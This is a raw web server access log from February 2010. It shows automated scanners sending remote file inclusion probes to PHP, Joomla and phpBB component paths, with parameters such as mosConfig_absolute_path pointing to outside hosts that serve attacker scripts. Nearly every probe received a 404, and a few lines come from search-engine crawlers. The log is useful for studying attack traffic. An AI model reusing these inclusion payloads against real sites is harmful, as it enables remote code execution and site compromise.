218.38.136.125 - - [15/Feb/2010:01:45:41 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:41 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:41 -0500] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:47 -0500] "GET /logs/access_log.Q109062700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:55 -0500] "GET /logs/access_log.Q109062700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:55 -0500] "GET /logs/access_log.Q109062700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:55 -0500] "GET /logs/access_log.Q109062700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:45:56 -0500] "GET /logs/access_log.Q109062700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:46:04 -0500] "GET /logs/access_log.Q109062700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:46:05 -0500] "GET /logs/access_log.Q109062700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:46:07 -0500] "GET /logs/access_log.Q109062700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:46:09 -0500] "GET /logs/access_log.Q109062700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:01:46:14 -0500] "GET /?mosConfig_absolute_path=' HTTP/1.1" 200 409 "-" "libwww-perl/5.76"
218.38.136.125 - - [15/Feb/2010:01:46:21 -0500] "GET /logs/access_log.Q109062700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.38.136.125 - - [15/Feb/2010:01:46:23 -0500] "GET /logs/access_log.Q109062700/components/com_performs/performs.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.100.181.217 - - [15/Feb/2010:01:46:40 -0500] "GET //component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
61.100.181.217 - - [15/Feb/2010:01:46:40 -0500] "GET /logs//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
61.100.181.217 - - [15/Feb/2010:01:46:40 -0500] "GET /logs/access_log.Q110020800//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
67.195.115.186 - - [15/Feb/2010:01:46:48 -0500] "GET /logs/error_log.Q109122700 HTTP/1.0" 200 3108448 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.100.181.217 - - [15/Feb/2010:01:47:20 -0500] "GET /logs/access_log.Q110011600//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:47:44 -0500] "GET /logs/access_log.Q109102900//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:01:47:52 -0500] "GET /logs/error_log.Q110020600//modules/vwar/admin/admin.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.126.254.139 - - [15/Feb/2010:01:47:59 -0500] "GET /write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
209.126.254.139 - - [15/Feb/2010:01:47:59 -0500] "GET /logs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
209.126.254.139 - - [15/Feb/2010:01:48:00 -0500] "GET /logs/error_log.Q110013100/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.126.254.139 - - [15/Feb/2010:01:48:07 -0500] "GET /logs/access_log.Q110013100/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
61.100.181.217 - - [15/Feb/2010:01:49:51 -0500] "GET //component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
61.100.181.217 - - [15/Feb/2010:01:49:51 -0500] "GET /logs//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
61.100.181.217 - - [15/Feb/2010:01:49:51 -0500] "GET /logs/access_log.Q110020800//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
61.100.181.217 - - [15/Feb/2010:01:50:21 -0500] "GET /logs/access_log.Q110011600//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.55.227.145 - - [15/Feb/2010:01:50:25 -0500] "GET /logs//components/com_htmlarea3_xtd-c/popups/Imag=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
218.55.227.145 - - [15/Feb/2010:01:50:25 -0500] "GET /logs/access_log.Q109081500//components/com_htmlarea3_xtd-c/popups/Imag=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 314 "-" "Mozilla/5.0"
218.55.227.145 - - [15/Feb/2010:01:50:25 -0500] "GET //components/com_htmlarea3_xtd-c/popups/Imag=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.126.254.139 - - [15/Feb/2010:01:50:58 -0500] "GET /write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
209.126.254.139 - - [15/Feb/2010:01:50:58 -0500] "GET /logs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
209.126.254.139 - - [15/Feb/2010:01:50:58 -0500] "GET /logs/error_log.Q110013100/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:51:14 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:51:14 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:51:14 -0500] "GET /logs/access_log.Q109123000//modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:51:20 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:51:20 -0500] "GET /logs/access_log.Q109123000%20%20//modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:51:20 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.126.254.139 - - [15/Feb/2010:01:51:50 -0500] "GET /logs/access_log.Q110013100/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:51:50 -0500] "GET /logs/access_log.Q109080500//modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:51:51 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:51:51 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:51:51 -0500] "GET /logs/access_log.Q109102900//modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:51:53 -0500] "GET /logs/access_log.Q109080500%20%20//modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:51:59 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:51:59 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:51:59 -0500] "GET /logs/access_log.Q109123000//modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:52:07 -0500] "GET /logs/access_log.Q109080500//modules/Forums/admin/admin_db_utilities.php?phpbb.root.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:01:52:17 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
95.108.128.242 - - [15/Feb/2010:01:53:19 -0500] "GET /logs/access_log.Q108061600 HTTP/1.1" 404 224 "-" "Yandex/1.01.001 (compatible; Win16; I)"
189.19.42.184 - - [15/Feb/2010:01:53:37 -0500] "GET /logs/access_log.Q110012600%20%20//bbs//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:53:44 -0500] "GET /logs/access_log.Q109071300//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
213.239.230.130 - - [15/Feb/2010:01:54:05 -0500] "GET //components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.anydiy.net/service/kin/test.txt????? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
213.239.230.130 - - [15/Feb/2010:01:54:05 -0500] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.anydiy.net/service/kin/test.txt????? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
189.6.218.57 - - [15/Feb/2010:01:54:21 -0500] "GET /logs/access_log.Q109063000//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:54:38 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:54:38 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:01:54:41 -0500] "GET /logs/access_log.Q110020300//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:01:55:05 -0500] "GET /logs/error_log.Q110020300//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:55:13 -0500] "GET /logs/access_log.Q109061200//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:57:53 -0500] "GET /logs/access_log.Q109092200/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:57:53 -0500] "GET /logs/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:57:53 -0500] "GET /phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:01:57:55 -0500] "GET /logs/access_log.Q109100100//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:01:57:55 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:01:57:55 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:01:57:59 -0500] "GET /logs/error_log.Q109100100//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:01:58:00 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:01:58:00 -0500] "GET /logs/access_log.Q109100100//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:01:58:00 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:01:58:04 -0500] "GET /logs/error_log.Q109100100//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.249.68.151 - - [15/Feb/2010:01:58:46 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L015145510381F600878B01F+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
189.6.218.57 - - [15/Feb/2010:01:58:47 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:58:47 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:58:47 -0500] "GET /logs/access_log.Q110011600%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:01:58:47 -0500] "GET /logs/error_log.Q109063000/?mosConfig_absolute_path=' HTTP/1.1" 404 224 "-" "libwww-perl/5.76"
62.140.23.24 - - [15/Feb/2010:01:58:47 -0500] "GET /?mosConfig_absolute_path=' HTTP/1.1" 200 409 "-" "libwww-perl/5.76"
62.140.23.24 - - [15/Feb/2010:01:58:47 -0500] "GET /logs/?mosConfig_absolute_path=' HTTP/1.1" 200 38402 "-" "libwww-perl/5.76"
62.140.23.24 - - [15/Feb/2010:01:59:06 -0500] "GET /logs/access_log.Q109112100/?mosConfig_absolute_path=' HTTP/1.1" 404 225 "-" "libwww-perl/5.76"
208.93.149.176 - - [15/Feb/2010:01:59:11 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:59:11 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:59:11 -0500] "GET /logs/access_log.Q109123000%20%20//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:59:17 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:59:17 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:59:17 -0500] "GET /logs/access_log.Q109123000//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:59:46 -0500] "GET /logs/access_log.Q110020700//bbs//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:59:47 -0500] "GET /logs/access_log.Q109080500%20%20//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
220.73.144.196 - - [15/Feb/2010:01:59:48 -0500] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
220.73.144.196 - - [15/Feb/2010:01:59:48 -0500] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
220.73.144.196 - - [15/Feb/2010:01:59:48 -0500] "GET /logs/access_log.Q109102900//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
220.73.144.196 - - [15/Feb/2010:01:59:52 -0500] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
220.73.144.196 - - [15/Feb/2010:01:59:52 -0500] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
220.73.144.196 - - [15/Feb/2010:01:59:52 -0500] "GET /logs/access_log.Q109102900//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:01:59:54 -0500] "GET /logs/access_log.Q109080500//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:59:59 -0500] "GET /logs/access_log.Q110012600//bbs//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:59:59 -0500] "GET /logs/access_log.Q110020100//bbs//delete_comment.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:02:00:07 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:02:00:07 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:02:00:07 -0500] "GET /logs/access_log.Q109123000//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
208.93.149.176 - - [15/Feb/2010:02:00:15 -0500] "GET /logs/access_log.Q109080500//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:00:35 -0500] "GET /logs/access_log.Q109100100%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:00:36 -0500] "GET /logs/access_log.Q109100100%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:02:00:39 -0500] "GET /logs/access_log.Q109120100//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:00:40 -0500] "GET /logs/error_log.Q109100100%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:00:41 -0500] "GET /logs/error_log.Q109100100%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
78.110.50.120 - - [15/Feb/2010:02:01:13 -0500] "GET /common/db.php?commonpath=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 211 "-" "libwww-perl/5.831"
78.110.50.120 - - [15/Feb/2010:02:01:13 -0500] "GET /logs/access_log.Q109082300/common/db.php?commonpath=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 238 "-" "libwww-perl/5.831"
78.110.50.120 - - [15/Feb/2010:02:01:13 -0500] "GET /logs/common/db.php?commonpath=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 216 "-" "libwww-perl/5.831"
78.110.50.120 - - [15/Feb/2010:02:01:38 -0500] "GET /logs/error_log.Q109091600/common/db.php?commonpath=http://www.provedorm4net.com.br/portal/.laknat/laknat???? HTTP/1.1" 404 237 "-" "libwww-perl/5.831"
64.15.158.246 - - [15/Feb/2010:02:02:21 -0500] "GET /logs///bbs/write_update.php?board_skin_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:02:21 -0500] "GET /logs/access_log.Q110012000%20%20///bbs/write_update.php?board_skin_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:02:21 -0500] "GET ///bbs/write_update.php?board_skin_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:03:15 -0500] "GET ///bbs/write_update.php?board_skin_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:03:15 -0500] "GET /logs/access_log.Q110012000///bbs/write_update.php?board_skin_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:03:15 -0500] "GET /logs///bbs/write_update.php?board_skin_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:02:03:24 -0500] "GET /logs/access_log.Q110011600//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
95.108.128.242 - - [15/Feb/2010:02:04:09 -0500] "GET /images/_notes/download_osteotomes.jpg.mno HTTP/1.1" 200 260 "-" "Yandex/1.01.001 (compatible; Win16; I)"
64.15.158.246 - - [15/Feb/2010:02:04:15 -0500] "GET /logs/access_log.Q110011200///bbs/write_update.php?board_skin_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:07:13 -0500] "GET /logs/access_log.Q110011200%20%20///bbs/write_update.php?board_skin_path=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.126.254.164 - - [15/Feb/2010:02:08:31 -0500] "GET /bbs/skin//ggambo7002_board/write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.126.254.164 - - [15/Feb/2010:02:08:31 -0500] "GET /logs/bbs/skin//ggambo7002_board/write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
